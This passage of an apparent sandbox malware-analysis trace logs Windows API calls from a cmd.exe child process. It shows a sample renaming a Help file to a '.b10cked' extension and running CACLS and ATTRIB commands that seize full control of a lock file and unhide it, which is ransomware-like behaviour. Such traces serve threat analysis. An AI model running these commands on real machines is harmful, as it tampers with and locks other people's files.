GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0196.552] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0196.553] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0196.553] GetConsoleTitleW (in: lpConsoleTitle=0x1a08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.554] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.554] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0196.554] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0196.554] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0196.554] _wcsicmp (_String1="move", _String2=")") returned 68 [0196.554] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0196.554] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0196.554] _wcsicmp (_String1="IF", _String2="move") returned -4 [0196.554] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0196.554] _wcsicmp (_String1="REM", _String2="move") returned 5 [0196.554] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0196.557] GetConsoleTitleW (in: lpConsoleTitle=0x12f6b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.557] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0196.557] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0196.557] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0196.557] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0196.557] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0196.557] _wcsicmp (_String1="move", _String2="CD") returned 10 [0196.557] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0196.557] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0196.557] _wcsicmp (_String1="move", _String2="REN") returned -5 [0196.558] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0196.558] _wcsicmp (_String1="move", _String2="SET") returned -6 [0196.558] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0196.558] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0196.558] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0196.558] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0196.558] _wcsicmp (_String1="move", _String2="MD") returned 11 [0196.558] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0196.558] _wcsicmp (_String1="move", _String2="RD") returned -5 [0196.558] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0196.558] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0196.558] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0196.558] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0196.558] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0196.558] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0196.558] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0196.558] _wcsicmp (_String1="move", _String2="VER") returned -9 [0196.558] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0196.558] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0196.558] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0196.558] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0196.558] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0196.558] _wcsicmp (_String1="move", _String2="START") returned -6 [0196.558] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0196.558] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0196.558] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0196.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.559] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f46c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f464, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f464*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0196.560] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0196.561] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0196.561] _wcsicmp (_String1="HX_103~1.HXD", _String2=".") returned 58 [0196.561] _wcsicmp (_String1="HX_103~1.HXD", _String2="..") returned 58 [0196.561] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxd")) returned 0x2022 [0196.561] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.561] SetErrorMode (uMode=0x0) returned 0x0 [0196.561] SetErrorMode (uMode=0x1) returned 0x0 [0196.561] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", nBufferLength=0x104, lpBuffer=0x12edf4, lpFilePart=0x12eddc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", lpFilePart=0x12eddc*="HX_103~1.HXD") returned 0x27 [0196.561] SetErrorMode (uMode=0x0) returned 0x1 [0196.561] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0196.561] _wcsicmp (_String1="HX_103~1.HXD", _String2=".") returned 58 [0196.561] _wcsicmp (_String1="HX_103~1.HXD", _String2="..") returned 58 [0196.562] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxd")) returned 0x2022 [0196.562] SetErrorMode (uMode=0x0) returned 0x0 [0196.562] SetErrorMode (uMode=0x1) returned 0x0 [0196.562] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", nBufferLength=0x104, lpBuffer=0x12f270, lpFilePart=0x12f008 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", lpFilePart=0x12f008*="HX_103~1.HXD") returned 0x27 [0196.562] SetErrorMode (uMode=0x0) returned 0x1 [0196.562] SetErrorMode (uMode=0x0) returned 0x0 [0196.562] SetErrorMode (uMode=0x1) returned 0x0 [0196.562] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked", nBufferLength=0x104, lpBuffer=0x12f478, lpFilePart=0x12f008 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked", lpFilePart=0x12f008*="Hx_1033_MValidator.HxD.b10cked") returned 0x39 [0196.562] SetErrorMode (uMode=0x0) returned 0x1 [0196.562] SetLastError (dwErrCode=0x0) [0196.562] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MValidator.HxD.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_1033_mvalidator.hxd.b10cked")) returned 0xffffffff [0196.562] GetLastError () returned 0x2 [0196.562] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", fInfoLevelId=0x1, lpFindFileData=0x12e984, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e984) returned 0x1a0e70 [0196.562] FindNextFileW (in: hFindFile=0x1a0e70, lpFindFileData=0x12e984 | out: lpFindFileData=0x12e984) returned 0 [0196.563] FindClose (in: hFindFile=0x1a0e70 | out: hFindFile=0x1a0e70) returned 1 [0196.563] GetLastError () returned 0x12 [0196.563] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", fInfoLevelId=0x1, lpFindFileData=0x12e984, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e984) returned 0x1a0e70 [0196.563] FindNextFileW (in: hFindFile=0x1a0e70, lpFindFileData=0x12e984 | out: lpFindFileData=0x12e984) returned 0 [0196.563] FindClose (in: hFindFile=0x1a0e70 | out: hFindFile=0x1a0e70) returned 1 [0196.563] GetLastError () returned 0x12 [0196.564] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", fInfoLevelId=0x1, lpFindFileData=0x1b1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1be0) returned 0x1a0e70 [0196.564] FindNextFileW (in: hFindFile=0x1a0e70, lpFindFileData=0x1b1be0 | out: lpFindFileData=0x1b1be0) returned 0 [0196.564] FindClose (in: hFindFile=0x1a0e70 | out: hFindFile=0x1a0e70) returned 1 [0196.564] GetLastError () returned 0x12 [0196.564] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXD", fInfoLevelId=0x1, lpFindFileData=0x1b1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1be0) returned 0x1a0e70 [0196.564] FindNextFileW (in: hFindFile=0x1a0e70, lpFindFileData=0x1b1be0 | out: lpFindFileData=0x1b1be0) returned 0 [0196.564] FindClose (in: hFindFile=0x1a0e70 | out: hFindFile=0x1a0e70) returned 1 [0196.564] GetLastError () returned 0x12 [0196.564] _get_osfhandle (_FileHandle=2) returned 0xb [0196.564] GetFileType (hFile=0xb) returned 0x2 [0196.657] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0196.657] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12eb54 | out: lpMode=0x12eb54) returned 1 [0196.658] _get_osfhandle (_FileHandle=2) returned 0xb [0196.658] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12eb88 | out: lpConsoleScreenBufferInfo=0x12eb88) returned 1 [0196.658] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.659] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ebc8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.659] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12ebac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ebac*=0x2c) returned 1 [0196.659] longjmp () [0196.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.659] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.659] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.660] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.660] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.660] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.660] SetConsoleInputExeNameW () returned 0x1 [0196.660] GetConsoleOutputCP () returned 0x1b5 [0196.660] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.660] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.660] exit (_Code=1) Process: id = "455" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xbc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28949 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28950 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28951 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28952 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 28953 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28954 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28955 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28956 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28957 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 28958 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28983 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28984 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28985 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28986 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 28987 start_va = 0x660000 end_va = 0x66ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 28988 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28989 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28990 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28991 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28992 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28993 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28994 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28995 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28996 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28997 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 28998 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28999 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29000 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29001 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29002 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29003 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29004 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 29005 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 29006 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 29032 start_va = 0x13e0000 end_va = 0x16aefff entry_point = 0x13e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 650 os_tid = 0xe18 [0196.585] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fbe4 | out: lpSystemTimeAsFileTime=0x20fbe4*(dwLowDateTime=0xa9ff71c0, dwHighDateTime=0x1d440a9)) [0196.585] GetCurrentProcessId () returned 0xbc0 [0196.585] GetCurrentThreadId () returned 0xe18 [0196.585] GetTickCount () returned 0x37b56 [0196.585] QueryPerformanceCounter (in: lpPerformanceCount=0x20fbdc | out: lpPerformanceCount=0x20fbdc*=25337424784) returned 1 [0196.586] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0196.586] __set_app_type (_Type=0x1) [0196.586] __p__fmode () returned 0x76b331f4 [0196.586] __p__commode () returned 0x76b331fc [0196.586] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0196.586] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0196.586] GetCurrentThreadId () returned 0xe18 [0196.586] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe18) returned 0x38 [0196.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.586] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0196.586] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.586] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.586] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fb74 | out: phkResult=0x20fb74*=0x0) returned 0x2 [0196.586] VirtualQuery (in: lpAddress=0x20fbab, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.586] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0196.586] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.586] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.587] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fb44, dwLength=0x1c | out: lpBuffer=0x20fb44*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0196.587] GetConsoleOutputCP () returned 0x1b5 [0196.587] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.587] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0196.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.587] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0196.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.587] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.587] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.587] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.587] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.587] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.587] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.587] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0196.588] GetEnvironmentStringsW () returned 0x3a0240* [0196.588] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0196.588] GetEnvironmentStringsW () returned 0x3a0240* [0196.588] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0196.588] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eae4 | out: phkResult=0x20eae4*=0x40) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0xd0, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x0, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 